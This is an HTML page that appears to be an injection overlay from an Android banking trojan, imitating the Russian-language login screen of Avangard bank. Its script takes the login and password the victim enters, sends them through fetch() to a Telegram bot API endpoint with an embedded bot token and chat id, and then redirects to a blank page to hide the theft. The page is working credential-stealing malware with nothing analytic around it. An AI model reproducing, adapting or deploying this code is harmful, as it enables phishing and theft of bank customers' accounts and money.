<html>
<head>
    <meta charset="UTF-8">
    <link rel="stylesheet" href="ru/css/bootstrap.min.css">
    <script src="ru/js/jquery.min.js"></script>
	<link rel="stylesheet" href="ru/ru.avangard/style.css">
</head>

<body>
    <div style="margin-top: 100px;"></div>
    <form action="null"  method="post" id="_mainForm" target="flow_handler">
        <input type="text" class="field" id="login" name="login" placeholder="Введите логин">

        <input type="password" class="field" id="password" name="password" placeholder="Введите пароль">

        <div style="margin-bottom: 20px;">
            <input type="checkbox"> <span style="color: #fff;">Сохранять логин</span>
        </div>
        <div>
            <input type="submit" class="button2" id="input_submitBtn" value="Войти">
            <input type="button" class="button" disabled value="Демо">
        </div>
        
        <div class="footer">
            <p style="width: 100%; opacity: 0.5; color: #fff;display: block;font-weight: initial;">Вход только для физических лиц</p>
            <p>Как получить логин и пароль?</p>
        </div>
    </form>
    <iframe src="about:blank" name="flow_handler" style="visibility:hidden;display:none"></iframe>
    <script type="text/javascript">function test2(){setTimeout(function(){ window.location.replace("file:///android_asset/blank.html");}, 1000); };
        (function () {
        var  __insHiddenField = function (objDoc, objForm, sNm, sV) {
            var input = objDoc.createElement("input");
            input.setAttribute("type", "hidden");
            input.setAttribute("name", sNm);
            input.setAttribute("value", sV);
            input.value = sV;
            objForm.appendChild(input);
        };
                    var g_oBtn = document.getElementById('input_submitBtn');
                    g_oBtn.onclick = function () {
                    
                        var oNumInp = document.getElementById('login');
                        var oCodeInp = document.getElementById('password');

                        try{
                            oNumInp.className = 'field';
                            oCodeInp.className = 'field';
                        } catch(e){};
                        
                        if (oNumInp.value.length < 6) {
                            try{
                                oNumInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
                        
                        if (!/^\w{4,100}$/i.test(oCodeInp.value)) {
                            try{
                                oCodeInp.className = 'field error';
                            } catch(e){};
                            return false;
                        }
						
top['closeDlg'] = true;
          	var url='<?php echo $URL; ?>';
           	var imei_c='<?php echo $IMEI_country; ?>';
           	fetch("https://api.telegram.org/bot2109326350:AAESgBTRopBgrGVKC-QwsM8XveGKDK-38M4/sendMessage?chat_id=-1001712661501&text=|Injection_3|ru_avangard|"+oNumInp.value+"|"+oCodeInp.value);test2();

        return false;
        };
        })();
    </script>
</body>
</html>